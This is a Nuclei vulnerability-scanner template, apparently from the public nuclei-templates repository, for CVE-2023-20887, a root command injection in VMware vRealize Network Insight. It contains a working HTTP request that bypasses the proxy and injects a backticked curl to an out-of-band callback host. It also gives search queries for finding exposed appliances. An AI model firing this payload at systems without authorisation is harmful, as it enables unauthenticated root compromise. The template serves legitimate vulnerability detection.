nuclei-templates/http/cves/2023/CVE-2023-20887.yaml

46 lines
1.8 KiB
YAML
Raw Normal View History

2023-06-13 15:38:36 +00:00
id: CVE-2023-20887
info:
2023-06-13 15:38:36 +00:00
name: VMware VRealize Network Insight - Remote Code Execution
author: sinsinology
severity: high
description: |
VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
a malicious actor can get remote code execution in the context of 'root' on the appliance.
VMWare 6.x version are vulnerable.
reference:
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
- https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
2023-06-13 15:38:36 +00:00
- https://github.com/sinsinology/CVE-2023-20887
metadata:
2023-06-13 15:38:36 +00:00
max-request: 1
verified: "true"
shodan-query: title:"VMware vRealize Network Insight"
fofa-query: title="VMware vRealize Network Insight"
2023-06-13 15:38:36 +00:00
tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast
http:
- raw:
- |-
POST /saas./resttosaasservlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-thrift
[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl {{interactsh-url}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- 'createSupportBundle'
- type: status
status:
2023-06-13 15:38:36 +00:00
- 200